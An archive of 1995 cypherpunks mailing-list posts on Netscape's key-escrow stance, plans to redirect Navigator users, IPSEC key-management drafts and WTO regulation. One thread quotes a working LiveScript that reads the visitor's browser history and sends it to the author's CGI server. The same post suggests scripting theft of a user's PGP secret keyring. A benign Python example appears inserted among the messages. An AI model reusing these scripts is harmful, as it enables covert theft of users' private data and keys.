> While this would go over well in the press if handled right please let 
> everyone remember that Jeff is a real person with bills to pay and food 
> to put on at least his own table.  Now if someone out there with their 
> own business is willing to match his politics with his purse and offer 
> Jeff a job at the same level if he *decides* to leave in the midst of GAK 
> flak...

If Jeff decided to leave, I don't think he'd have much trouble 
getting something else - I'd be surprised if he wasn't employed the 
next day.

Of course, if Jeff's got any stock in Netscape, he'd be nuts to leave 
- unless he values his principles more than he values his stock.  No 
insult intended.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 1 Dec 1995 16:59:25 +0800
To: Ed Carp <ecarp@netcom.com>
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010738.BAA17804@khijol>
Message-ID: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Ed Carp wrote:

> I believe that Netscape uses "Mozilla" as their keyword when 
> exchanging browser-specific information.

The field is User-Agent. However, blocking access to users of Navigator 
isn't a particularly useful thing to do. If you must do something, why 
not modify your GET handler to add a header to the start of all html 
pages informing people of the problem, and suggesting alternatives. 

Someone else [I can't remember, but I'll call them Alice] claimed that the
security problems showing up were part of a deliberate conspiracy.  Anyone
who knows anything about the history of these things knows how
absurd this is. The principals at Netscape are a nice bunch of really
guys, but were not really up to speed on issues like security and
networking- for example, the first incarnation of SSL had an RC4 stream
running with no checksumming whatsoever. The security problems that
resulted are due to the learning curve.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 14:20:08 +0800
To: graeme@chem2.chem.swin.edu.au (Graeme Cross)
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010605.BAA18775@homeport.org>
MIME-Version: 1.0
Content-Type: text


	About a month ago, I made the argument that Java, despite its
imperfections, is much better than most things we'll see.  I stand by
this argument, and urge Netscape to use only Java* as a scripting
language.

	*By Java, I mean the class of languages designed with security
in mind.  I think that means Java and Safe-TCL.  Taint-perl is not
useful; it's designed for unsafe input from a user, not unsafe code.

	People with time to hack netscape might experiment with
location.href = "file://.pgp/secring.pgp" and see if you can write a
script to export it somewhere.

And here's how it's done.  Hitting the page makes your history public
knowledge.  (Btw, Bal, is Netbsd1.1 stable yet? :)

scott@tripleg.com.au wrote this code:

<SCRIPT LANGUAGE="LiveScript">

<!--
  i = 0
  yourHistory = ""
  while (i < history.length) { 
    yourHistory += history[i]
    i++;
    if (i < history.length) yourHistory += "^"
  }
  location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?"+yourHistory
<!-- hahah here is the hidden script -->


Graeme Cross wrote:
| >From: Scott Weston <scott@tripleg.com.au>
| >The "LiveScript" that I wrote extracts ALL the history of the current
| >netscape window.  By history I mean ALL the pages that you have visited
| >to get to my page, it then generates a string of these and forces the
| >Netscape client to load a URL that is a CGI script with the QUERY_STRING
| >set to the users History.  The CGI script then adds this information
| >to a log file.  Now if this hasn't quite CLICKED yet lets do a little
| >example.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markson@osmosys.incog.com (Tom Markson)
Date: Sat, 2 Dec 1995 23:56:39 +0800
To: cypherpunks@toad.com
Subject: re: SKIP source release is out
In-Reply-To: <199511301758.JAA08943@bullterrier.incog.com>
Message-ID: <9512010919.AA29567@monster.incog.com>
MIME-Version: 1.0
Content-Type: text/plain


> Doug Hughes writes:
[ Perry Metzger writes: ]
> > >SKIP is a non-standard being pushed by Sun.
> >
> > Correct me if I'm wrong, but isn't sun trying to make it a standard
> > (in competition with Photuris) ?

Doug, you are correct.  SKIP is an IPSEC internet draft.  Photuris is
an IPSEC internet draft.  Perry is incorrect in saying that SKIP is 
a non-standard.   Both of the chairs of the IPSEC group have said SKIP 
is part of the IPSEC working group.   Phil Karn (author of Photuris)
has also said this.  Both SKIP and Photuris are on the standards track.
They are, as you indicated, "competing" protocols.

> The IETF has many sorts of standards. It explicitly has a way to
> standardize things that the IETF doesn't think are a good idea but
> which should have the ability to interoperate if you do them.

That's true, but SKIP is not in that category.    I believe neither SKIP
nor Photuris have been declared "mandatory" as of this point.  They both
have the same status in IPSEC.  

> My opinion is that it is fairly clear that Photuris is the key
> management system people will be using, although it is going to have
> to evolve to work with a real network wide certificate database
> infrastructure. SKIP isn't going to be the standard.

Again, in *your* opinion.  No determination has been made that I know of.

--tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sun, 3 Dec 1995 00:24:51 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <199512010605.BAA18775@homeport.org>
Message-ID: <9512010651.AA21856@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: Adam Shostack <adam@lighthouse.homeport.org>
   Date: Fri, 1 Dec 1995 01:05:49 -0500 (EST)
   Cc: cypherpunks@toad.com
   X-Mailer: ELM [version 2.4 PL24 ME8b]
   Content-Type: text
   Content-Length: 1647      
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   (Btw, Bal, is Netbsd1.1 stable yet? :)

Seems stable enough to me, although I've only been running 1.1 since the
official release a couple of days ago.  I was able to trigger Scott
Weston's LiveScript with a Linux Netscape binary in 1.1's Linux
compatibility mode.  That's stable enough for me.

Oh, and PGP 2.6.2 built right out of the box :-)

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 18:48:29 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <30BED7A6.623B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> [As seen on the cypherpunks list]
> 
> I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry
> from the Mac version of 2.0b3. No need for anyone else to test it.

  Sorry Rich, you must be mistaken.  All of the beta 3 entries had
empty history.  This problem was fixed in beta 3.

> Very nasty indeed. To what other variables might someone have access?

  We will be reviewing everything that is reflected into livescript
before the final 2.0 release.  All of this stuff will also be
documented so that you all can review it looking for anything
dangerous.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 18:49:36 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <30BED8E9.16FC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This problem was found a few weeks ago and we fixed it immediately.
You all can see the fix in Beta 3, which does not reflect the
history strings into livescript.  As soon as I heard of the problem
I insisted that it be fixed right away.  I also had a fairly extensive
discussion with the creator of livescript about what other things
might be dangerous.  We didn't come up with anything, but will be
doing a security review of livescript before the final 2.0 release
just to make sure.

	--Jeff
  
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 19:02:19 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <m0tHeeN-0008zTC@pacifier.com>
Message-ID: <30BEDBF4.483A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> >On September 27, Jeff Weinstein of Netscape (and others) wrote:
> >
> >> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> >> > > hint).
> >> >
> >> > We are working this issue with the government.  As soon as we can
> >> > make it available for download we will.
> >
> >> In other words, we will never see it in our lifetimes -- the
> >> bureaucreeps aren't known for promoting the spread of strong crypto.
> >
> >>>  Where did I imply that if the govt. ignored us or said no that we
> >>>  would meekly go away with tail between legs?
> 
> Here's a question:  Why can't Netscape be released WITHIN THE US with 128
> bit keys?  Admittedly, it would probably...uh...escape within a few hours,
> but that's no worse than what other cryptosystems (best-known example, PGP)
> have done.

  It is.  You can buy it from our home page, or from most computer
stores.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@obscura.com>
Date: Fri, 1 Dec 1995 18:02:54 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Barring access to Netscape
Message-ID: <9512010953.AA26357@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 11/30/95 -0800, you wrote:
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.
>
Here is the Netscape specific code that does exactly this: 
<meta http-equiv="Refresh" content="1;URL=http://www.cypherpunks.com/verysadtaleaboutnetscapeandgak.html"> 

It simply sends the viewer to the URL listed after the ";URL" bit. I use it on my
page to get to my Netscape optimized section (soon to go by the wayside).

Try it and see.

   Adam

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://www.compuvar.com/adam   |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 03:38:08 +0800
To: cypherpunks@toad.com
Subject: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <ace40c750602100466d1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:43 AM 12/1/95, Leslie Todd Masco wrote:

>I've been told that many media-types go to the archives whenever c'punks
>make the news.  How much of an effect do y'all think it'll have if they
>can't do it with Netscape?

Even better, let's see the journalists get the story first-hand.

I hope the media types reading now will attend the December 5th (I
think...details should be available) gathering on "key escrow" in
Washington, D.C. This should be a fiery meeting, especially if the Netscape
reps (I assume someone from Netscape will be attending, given their central
role in the all-important Web world) either denounce GAK or support GAK.

Frankly, and my thanks again to Sameer for bringing this to our attention,
this flap over Jim Clark's GAK-supporting remarks could not have come at a
better time: the issue of GAK will not be ignored.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 17:32:59 +0800
To: cactus@hks.net
Subject: Re: Barring access to Netscape
Message-ID: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>If Netscape really does go the GAK route, I will unilaterally
>do this to the Cypherpunk Archives (or something similar, like every
>request flashing up briefly and then client-pulling the GAK pages).

After talking to a couple of people, and playing around some, this seems
to be a better choice.  That way, you can actually send information (including
a list of where to get other browsers) instead of just garbage to netscape
users.  Is anyone aware of browsers other than Netscape that do client pulls?

A simple filter to do (and undo) this would still be useful, I think so that
users can easily fix all their documents.  Fortunately, that would be very
easy to write.

>I've been told that many media-types go to the archives whenever c'punks
>make the news.  How much of an effect do y'all think it'll have if they
>can't do it with Netscape?
>
>Shouldn't be too hard to hack this into Apache.

That's not a bad idea either.  Hopefully, Netscape will post a retraction
(soon!) and none of this will be necessary.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 
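
The server-side notice suggested in this thread (look at the User-Agent request header and put a notice at the start of HTML pages), as an added example that is not code from any poster. The function names, the placeholder notice URL and the sample strings other than "Mozilla/2.0b3 (Win95; I)" are assumptions; User-Agent is supplied by the client, so it is treated as untrusted text and escaped before being echoed, and the "compatible" check shows why matching the bare keyword "Mozilla" also hits other browsers.

```python
import html
import re

# "Product/version (comment)" at the start of a User-Agent value,
# e.g. "Mozilla/2.0b3 (Win95; I)" as quoted elsewhere in this thread.
_UA = re.compile(r"^\s*([^\s/()]+)/(\S+)(?:\s+\(([^)]*)\))?")

NOTICE_URL = "http://example.invalid/notice.html"  # placeholder, not a real page


def classify_user_agent(value):
    """Return 'navigator', 'compatible', 'other' or 'missing'.

    Assumes 1995-era strings: browsers imitating Navigator announce
    themselves as "Mozilla/x (compatible; ...)". The value is advisory
    only; any client can send any string, so this is not access control."""
    if not value or not value.strip():
        return "missing"
    m = _UA.match(value)
    if not m or m.group(1).lower() != "mozilla":
        return "other"
    comment = (m.group(3) or "").strip().lower()
    return "compatible" if comment.startswith("compatible") else "navigator"


def get_header(headers, name):
    """HTTP header names are case-insensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def add_notice(headers, page, notice_url=NOTICE_URL):
    """Return `page` with a notice inserted for Navigator clients only."""
    ua = get_header(headers, "User-Agent")
    if classify_user_agent(ua) != "navigator":
        return page
    # Both values are escaped: the header is attacker-controlled input and
    # must never reach the page as markup.
    banner = (
        '<p><strong>Notice for Netscape Navigator users:</strong> '
        '<a href="%s">please read this first</a>. '
        'Your browser identified itself as: %s</p>'
        % (html.escape(notice_url, quote=True), html.escape(ua, quote=True))
    )
    body = re.search(r"<body\b[^>]*>", page, flags=re.IGNORECASE)
    if body:                                   # right after the <body> tag
        return page[:body.end()] + "\n" + banner + page[body.end():]
    return banner + "\n" + page                # no <body>: prepend


if __name__ == "__main__":
    # Constructed sample requests.
    page = "<html><BODY BGCOLOR=white><h1>Archive</h1></BODY></html>"
    for ua in ("Mozilla/2.0b3 (Win95; I)",
               "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
               "Lynx/2.4 libwww/2.14",
               None):
        print(classify_user_agent(ua), "->",
              add_notice({"user-agent": ua} if ua else {}, page)[:60])
```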




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 18:27:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace40e9207021004e5e8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


With the assumption that this is not a troll, and giving the writer some
slack on account of the non-native-English-language origin, I'll respond to
a few of his or her points:

At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>With regard to all this waving about Netscape giving in to key scrow...

Key _escrow_, though "scrow" is perhaps just as accurate as the
improperly-named "key escrow" (hint: escrow is something done voluntarily,
not the situation here with GAK).

>First one question, and then some considerations. The question:
>
>- How much of Netscape stock is in the hands of Netscape? I mean in the hands
>of the people that work in/for the Company? And how much is in outsiders whose
>only interest is earning as much as possible?

A small fraction of the shares are now for sale. The exact numbers can be
gotten from the Netscape offering prospectus (ironically, I tried to hunt
for it in Infoseek, but Netscape claimed it was busy the 10 or so times I
tried to run Infoseek on "Netscape"...no conspiracy, just crowding, even at
1:45 a.m. PST).

In particular, the billion dollars' worth of Netscape stock (and/or
options) that Jim Clark holds is mostly not on the open market (and won't
be for years).

Having said this, I think all of the shareholders, either of issued shares
or as-yet-unissued shares, are interested in maximizing share value. Not
surprising.

Importantly--and maybe this is the real point JR is making--we on the
Cypherpunks list are probably *not* interested in Netscape's stock price.
But who cares? Our role is not to maximize Netscape stock price, but to
talk about what is "right" and what is not right. And GAK is definitely not
right, to the vast majority of us.

>That is, my friends, the key point. When Netscape began selling shares, and
>before and after that, they were (and still are) widely criticized in this
>list.

They were "criticized" not because they went public with their stock but
because of their security mistakes, made more important by their sudden
prominence. The Net/Web is being built up of beams, struts, and bricks, and
it's important to point out flaws that make the beams buckle and structures
collapse.

...
>So, now we have that most of Netscape is owned by people that either don't
>care but for money, or fundamental activists. And then, those people have to
>take decisions.

??? I don't get the point you're making. Sure, most of Netscape stock that
is publicly traded is owned by investors. On the other hand, most of the
stock that is not yet issued or is tied up in unexercised stock options is
in a sense owned by people who care how well the stock does.

>And then they are faced with confronting their government who tells them what
>to do if they don't want to have problems. And who probably offers some hidden
>compensations to get their support (maybe tax reliefs?). And who menaces with
>countermeasures if they don't agree.

Well, this is the point, isn't it? I doubt there are such things as "tax
reliefs" for Netscape--these things are done pretty much out in the open in
the U.S., and any special tax treatment would be widely noticed--but there
may indeed have been "discussions" with senior management at Netscape.
Several of us have already speculated in broad terms on this.

Look, I don't impute personal malice to Jim Clark. I do, however, believe
in "institutional evil," in the sense that a GAK regiment which says, for
example, that anyone who keeps a diary must "escrow" copies of it with the
local police is an "evil" idea, counter to the Western notions of liberty
and justice.

Thus, for whatever reason Jim Clark came out in support of GAK, we must
criticize it. And take positive steps to counter it (which I think we are
doing).

>What did you expect Netscape to do? The guys with the money and the control
>won't face all the small shareholders and tell them they are going to be
>"evil" against the gov. and the priests and the religious organizations,
>and that they will face gov. restrictions, give up political and economic
>advantages, etc.. to satisfy a bunch of cypherpunks that are continuously
>complaining publicly against the company and don't even buy shares.

First, a viable strategy is to simply do nothing. Ignore the government's
protestations, drag one's feet, shrug, etc. Jim Clark could simply have
said nothing. (Recall that Bill Gates came out recently saying that strong
encryption is inevitable...Clark could have either said nothing, or said
something similar to what Gates said.)

Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
truly pushes for GAK, and people reject GAK and Netscape, then this will
surely hurt shareholder value. (Frankly, I expect one or more stories to
appear in the next few days about the budding "Friends Don't Let Friends
Use Netscape" and "Just Say No to Netscape" movements. Whether this will
hurt the stock is unclear.)

>Sitting back and complaining won't help crypto, freedom or anything for that
>matter at all.
>
>That said, before blaming more on Netscape and asking a starting company
>whose major asset is still shareholders instead of sales, we should think
>better about the correct strategy.
>
>Now, who's gonna offer some constructive ideas for a change?

I say that the ideas being discussed are in fact "constructive" ideas.  I
won't reiterate them all here, but they clearly involve concrete action
(e.g., modifying server software to issue warnings to Netscape users, or
encouragement of alternatives to Netscape).

What more are you expecting? Have you been reading what people are actually
discussing doing and actually already doing?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Fri, 1 Dec 1995 17:09:22 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512010843.DAA23202@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James A. Donald <jamesd@echeque.com> wrote:
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.

If Netscape really does go the GAK route, I will unilaterally
do this to the Cypherpunk Archives (or something similar, like every
request flashing up briefly and then client-pulling the GAK pages).

I've been told that many media-types go to the archives whenever c'punks
make the news.  How much of an effect do y'all think it'll have if they
can't do it with Netscape?

Shouldn't be too hard to hack this into Apache.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML7AKCoZzwIn1bdtAQEPhAF9HY/ARaVLTFcvyQ1utx94uZ+ZmeXOemmO
2jnX4y/gDelAEO+C7kBAprm8GDyLhgJQ
=G5jT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Fri, 1 Dec 1995 12:30:29 +0800
To: sameer <sameer@c2.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301616.IAA18452@infinity.c2.org>
Message-ID: <Pine.3.89.9512010401.A6882-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> 	Jeff: If Netscape comes out in favor of GAK, will you leave?
> (Wait until February, at least, of course..) You don't have to answer
> that to me, or the list, just think about it, and answer it for
> yourself.  Do you think "anyone else" there would leave, as you say
> below that they don't want to go down history, etc...
> 

While this would go over well in the press if handled right please let 
everyone remember that Jeff is a real person with bills to pay and food 
to put on at least his own table.  Now if someone out there with their 
own business is willing to match his politics with his purse and offer 
Jeff a job at the same level if he *decides* to leave in the midst of GAK 
flak...

> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 1 Dec 1995 18:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: WTO an even worse possibility as Inet regulator.
Message-ID: <Pine.BSD.3.91.951201050752.28674C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
attila@primenet.com did the list a service when he sent his 
message, "WTO an even worse possibility as Inet regulator." 
 
Basing the message "on an article from the (London) Financial 
Times," he states that 
 
   a very credible white paper is circulating for the WTO to 
   establish an internet CZAR to regulate the Internet... 
 
and he asks: 
 
   personally, the Feds and the FCC are bad enough --now 
   they want to have a **global** bureaucracy play god  -??? 
 
 
That 11 29 95 Financial Times newsstory is headlined: 
 
     Global regulator urged for information highway 
 
 
Who's doing the urging? 
 
The Royal Institute of International Telecommunications 
Policy put out a report written by a Shell man and a think- 
tank woman. 
 
As regards encryption, the RIITP people 
 
   ...point out that issues such as...encryption...have global 
   rather than national aspects. 
 
 
Then they contradict themselves: 
   
   "Encryption, for example, raises tricky and emotive issues 
   connected with...national security and cannot be treated 
   simply as a business problem." 
 
 
Whatever works!  They "encrypt" the ultimatums of the New World 
disorder in any...key. 
 
At the very end of the newsstory: 
 
   Global Superhighways, Chatham House, 10 St James 
   Square, London SW1Y 4LE 
 
 
I'm guessing Global Superhighways is the title of the RIITP 
report.  As for Chatham House... 
 
  In 1919 [a group of young men who became the dominant 
  influence in British imperial and foreign affairs up to 1939] 
  founded the Royal Institute of International Affairs (Chatham 
  House) for which the chief financial supporters were Sir Abe 
  Bailey and the Astor family (owners of The [London] Times). 
  Similar Institutes of International Affairs were established 
  in the chief British dominions and in the United States 
  (where it is known as the Council on Foreign Relations). 
 
    --Carroll Quigley [Clinton's mentor].  Tragedy and Hope. 
      A History of the World in Our Time.  Macmillan, 1966. 
      P 132. 
 
 
RIITP is probably a front for RIIA.  I conjecture, though, that 
the real publisher of the report has his house in Washington. 
 
I agree with jamesd@echeque.com who writes: 
 
        The main threat to freedom is still internal, 
                    rather than external. 
 
 
Looked at from the inside, of course. 
 
 
Cordially, 
 
Jim 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 1 Dec 1995 18:42:34 +0800
To: Jordan Hayes <jmhayes@netcom.com>
Subject: Re: A challenge ...
In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com>
Message-ID: <Pine.SUN.3.91.951201052933.12777B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jordan Hayes wrote:

> I've been challenged to try to find a bank account; I win the challenge
> if I can wire in $100 to the hidden account.  Anyone have any good
> ideas about how to find an ABA number?

For $95 I will do all the work for you.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 15:29:18 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <199512010519.VAA12922@blob.best.net>
Message-ID: <Pine.BSD.3.91.951201061914.17960C-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, James A. Donald wrote:

> At 08:40 PM 11/30/95 +0000, attila wrote:
> >	<attila sez>  but WTO is also accumulating a rather larger 
> >    bureaucracy and is challenging Uncle Sam on several major unilateral
> >    actions.  [...] and it will be by the WTOs and world courts, or the
> >    Rockefeller NWO --read UN, and UN troops in America. 
> 
> This is excessively paranoid:  The main threat to freedom is still
> internal, rather than external.
>
    	<attila sez #2> I do not think it is particularly paranoid. the 
    trend is set. As the UN accumulates power it gains larger support from
    the third world who significantly out-vote, in terms of US standards
    of one man, one vote traditions. 

	 I also think it is going to be difficult for the permanent 
    members of the security council to justify their singular veto power 
    (except China, of course). The UN, as it is currently chartered
    effectively leaves the power in the hands of the security council; the
    general assembly generally is a forum for anti-American,
    anti-European, etc. rhetoric. 

	if the UN sets the court with open membership and no vetoes, the 
    US is boxed into either defying the court with all the attendant
    public relations problems or surrendering its economic interests. 

        what it boils down to, a decision must be made between compelling 
    economic interests and one man, one vote; the latter choking the US 
    rather quickly.
 
> The major expansion of WTO power came because of the notorious
> corruption and one sidedness of American courts judging disputes
> between foreign and American businessmen.
>
       <attila sez #2>  got any real samples where foreign courts are 
    impartial to domestic interest v. US interests?
 
> Since WTO courts do not have WTO gunmen this amounts to a major
> separation of judicial and executive power, thus though it is
> a centralizing move, it is also a move that favors liberty and
> the rule of law.
>
        <attila sez #2> I think you're too idealistic as to the results 
    based on ideology!  or, maybe I am too cynical...  :)
 
> Of course the first stages in centralization always do, at first,
> favor liberty and the rule of law as they restrain corrupt and
> lawless local powers.  Later, much later, the centralized power
> becomes a greater threat to liberty than those local authorities
> that it restrained.  
>
	<attila sez #2>  here we agree 100%
 
> That stage is still a long way down the track, and very likely 
> the modern nation state will collapse first.
> 
        <attila sez #2> history is compressing the time frame as 
    new "history" is made.  As for the nation-state collapsing first, no, 
    I think it will be a case of the nation-state being helped along by
    the NWO or whatever globalization of power.

        I would certainly rather believe it is a long way off, but the US 
    is no longer solvent. It has gone from the largest creditor country in
    the world to the largest debtor (v. all the rest of the world
    combined) in a space of less than 50 years.  This is nothing more than
    a self serving bureaucracy promising all things to all people and
    blowing it on basic high school level economics --it is the equivalent
    of kiting checks or credit cards, for which we would go to jail. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 14:42:09 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010620.HAA28237@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

sameer wrote:

>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like 
>        Netscape.

Yes, bad. Yes, almost. Like a psychotic, Netscape has been teasing people with annoyingly buggy "betas," seeming to be well-intentioned, innocently clumsy, forgivable for its enthusiasm. Now the mask drops and we see the feral beast.

tcmay wrote:

> Jim Clark is actively working for the enemies of liberty and 
> freedom.

As usual, Tim states it concisely, even elegantly.

> I wonder what discussions Jim Clark has been having with the 
> Feds?

I can assure those who doubt this that Jim did not wake up one morning saying, "Gee, this security thing is just so-o-o-o big a nut to crack that we need to bump it upstairs to the Big Boys. Yeah! That's it! Uncle Sam will make the Internet safe for commerce! Boy, this is going to be a great day! Hey, Mom! Can I have a slice of your great apple pie for breakfast?  B-r-r-r!  It's brisk this morning! Mom, Where did you put my flag?"

With Netscape's sudden and surprising rise to prominence, its executives have no doubt been getting a crash course on what it's like to live in the world of people who take power and money VERY seriously. They've no doubt been disabused of childish notions and shown the glint of steely knives in the recesses of three-piece suits. No doubt more than one stomach plummeted to the sub-basement as they learned that Wonderland is populated by dark and deadly predators who don't just meekly make room for a new player.

Jim may not even be important enough to have been the one visited, but we can be sure someone was visited and explained some of the rules by which the full-contact professional game is played. What we are witnessing here is the loss of innocence, noticeable only because the time scale is so compressed by Netscape's explosive rise.

